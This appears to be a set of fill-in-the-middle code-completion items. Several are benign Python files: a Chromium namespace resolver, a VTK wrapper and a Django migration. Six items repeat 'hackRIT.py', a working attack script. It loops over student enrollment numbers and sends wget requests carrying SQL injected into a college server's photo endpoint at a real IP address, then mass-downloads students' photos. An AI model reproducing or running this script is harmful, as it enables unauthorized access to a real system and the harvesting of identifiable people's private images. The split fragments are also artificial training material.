if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | __init__ |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
  # Try to find the file defining the namespace. E.g. for
  # 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def <|fim_middle|>(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | ResolveNamespace |
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
  # Try to find the file defining the namespace. E.g. for
  # 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def <|fim_middle|>(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
<|fim▁end|> | ResolveType |
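The nine rows above slice the same Chromium namespace_resolver.py helper at different hole positions. As a reading aid, the search heuristic implemented by _GenerateFilenames can be reproduced in a short standalone sketch; unix_name below is a simplified stand-in for Chromium's model.UnixName (an assumption, not the real helper), so treat the sketch as illustrative only.

import re

def unix_name(name):
    # Simplified stand-in (assumption): 'systemInfo.cpu' -> 'system_info_cpu'.
    name = name.replace('.', '_')
    return re.sub(r'(?<=[a-z0-9])([A-Z])', r'_\1', name).lower()

def generate_filenames(full_namespace):
    # Mirrors _GenerateFilenames: the most specific candidate is appended last.
    filenames = []
    basename = None
    for namespace in reversed(full_namespace.split('.')):
        basename = unix_name(namespace if basename is None
                             else namespace + '.' + basename)
        for ext in ('json', 'idl'):
            filenames.append('%s.%s' % (basename, ext))
    return filenames

print(generate_filenames('systemInfo.cpu'))
# -> ['cpu.json', 'cpu.idl', 'system_info_cpu.json', 'system_info_cpu.idl']
# ResolveNamespace() then iterates with reversed(), so the most specific
# candidate (system_info_cpu.idl) is probed on disk first.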
<|file_name|>pip3.py<|end_file_name|><|fim▁begin|>import subprocess
<|fim▁hole|>
subprocess.call(["python3", "setup.py", "sdist", "upload"])<|fim▁end|> | def release(): |
<|file_name|>pip3.py<|end_file_name|><|fim▁begin|>import subprocess
def release():
<|fim_middle|>
<|fim▁end|> | subprocess.call(["python3", "setup.py", "sdist", "upload"]) |
<|file_name|>pip3.py<|end_file_name|><|fim▁begin|>import subprocess
def <|fim_middle|>():
subprocess.call(["python3", "setup.py", "sdist", "upload"])
<|fim▁end|> | release |
<|file_name|>vtkRuledSurfaceFilter.py<|end_file_name|><|fim▁begin|># class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase<|fim▁hole|> def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkRuledSurfaceFilter(), 'Processing.',
('vtkPolyData',), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)<|fim▁end|> | import vtk
class vtkRuledSurfaceFilter(SimpleVTKClassModuleBase): |
<|file_name|>vtkRuledSurfaceFilter.py<|end_file_name|><|fim▁begin|># class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkRuledSurfaceFilter(SimpleVTKClassModuleBase):
<|fim_middle|>
<|fim▁end|> | def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkRuledSurfaceFilter(), 'Processing.',
('vtkPolyData',), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None) |
<|file_name|>vtkRuledSurfaceFilter.py<|end_file_name|><|fim▁begin|># class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkRuledSurfaceFilter(SimpleVTKClassModuleBase):
def __init__(self, module_manager):
<|fim_middle|>
<|fim▁end|> | SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkRuledSurfaceFilter(), 'Processing.',
('vtkPolyData',), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None) |
<|file_name|>vtkRuledSurfaceFilter.py<|end_file_name|><|fim▁begin|># class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkRuledSurfaceFilter(SimpleVTKClassModuleBase):
def <|fim_middle|>(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkRuledSurfaceFilter(), 'Processing.',
('vtkPolyData',), ('vtkPolyData',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
<|fim▁end|> | __init__ |
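The DeVIDE wrapper rows above simply forward to VTK's vtkRuledSurfaceFilter. For context, a minimal plain-VTK sketch of typical use follows (an assumption about ordinary usage outside DeVIDE, not code taken from it): two polylines are appended into one dataset and a ruled surface is stretched between them.

import vtk

# Two boundary polylines to rule between.
line1 = vtk.vtkLineSource()
line1.SetPoint1(0.0, 0.0, 0.0)
line1.SetPoint2(1.0, 0.0, 0.0)
line1.SetResolution(20)

line2 = vtk.vtkLineSource()
line2.SetPoint1(0.0, 1.0, 0.3)
line2.SetPoint2(1.0, 1.0, 0.3)
line2.SetResolution(20)

both = vtk.vtkAppendPolyData()
both.AddInputConnection(line1.GetOutputPort())
both.AddInputConnection(line2.GetOutputPort())

ruled = vtk.vtkRuledSurfaceFilter()
ruled.SetInputConnection(both.GetOutputPort())
ruled.SetResolution(21, 21)        # u/v sampling of the generated surface
ruled.SetRuledModeToResample()     # resample mode suits two open polylines
ruled.Update()

print(ruled.GetOutput().GetNumberOfPolys())  # non-zero when a surface was built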
<|file_name|>0002_auto_20180826_0054.py<|end_file_name|><|fim▁begin|><|fim▁hole|>
class Migration(migrations.Migration):
dependencies = [
('model_filefields_example', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='book',
name='cover',
field=models.ImageField(blank=True, null=True, upload_to='model_filefields_example.BookCover/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='book',
name='index',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookIndex/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='book',
name='pages',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookPages/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='sounddevice',
name='instruction_manual',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.SoundDeviceInstructionManual/bytes/filename/mimetype'),
),
]<|fim▁end|> | # Generated by Django 2.1 on 2018-08-26 00:54
from django.db import migrations, models
|
<|file_name|>0002_auto_20180826_0054.py<|end_file_name|><|fim▁begin|># Generated by Django 2.1 on 2018-08-26 00:54
from django.db import migrations, models
class Migration(migrations.Migration):
<|fim_middle|>
<|fim▁end|> | dependencies = [
('model_filefields_example', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='book',
name='cover',
field=models.ImageField(blank=True, null=True, upload_to='model_filefields_example.BookCover/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='book',
name='index',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookIndex/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='book',
name='pages',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookPages/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='sounddevice',
name='instruction_manual',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.SoundDeviceInstructionManual/bytes/filename/mimetype'),
),
] |
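The two migration rows above only alter upload_to paths. A hypothetical sketch of model declarations consistent with those AlterField operations is shown below; the real models live in model_filefields_example and are not part of this dump, so the class layout is an assumption, while field names, types, and options are taken from the migration itself.

from django.db import models

class Book(models.Model):
    # Field definitions matching the AlterField operations above.
    cover = models.ImageField(
        blank=True, null=True,
        upload_to='model_filefields_example.BookCover/bytes/filename/mimetype')
    index = models.FileField(
        blank=True, null=True,
        upload_to='model_filefields_example.BookIndex/bytes/filename/mimetype')
    pages = models.FileField(
        blank=True, null=True,
        upload_to='model_filefields_example.BookPages/bytes/filename/mimetype')

class SoundDevice(models.Model):
    instruction_manual = models.FileField(
        blank=True, null=True,
        upload_to='model_filefields_example.SoundDeviceInstructionManual/bytes/filename/mimetype')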
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department<|fim▁hole|>elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images<|fim▁end|> | |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
<|fim_middle|>
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | year_choice = 1300000 #Final Year |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
<|fim_middle|>
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | year_choice = 1400000 #Third Year |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
<|fim_middle|>
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | year_choice = 1500000 #Second Year |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
<|fim_middle|>
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | year_choice = 1600000 #First Year |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
<|fim_middle|>
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 1000 #Automobile Department |
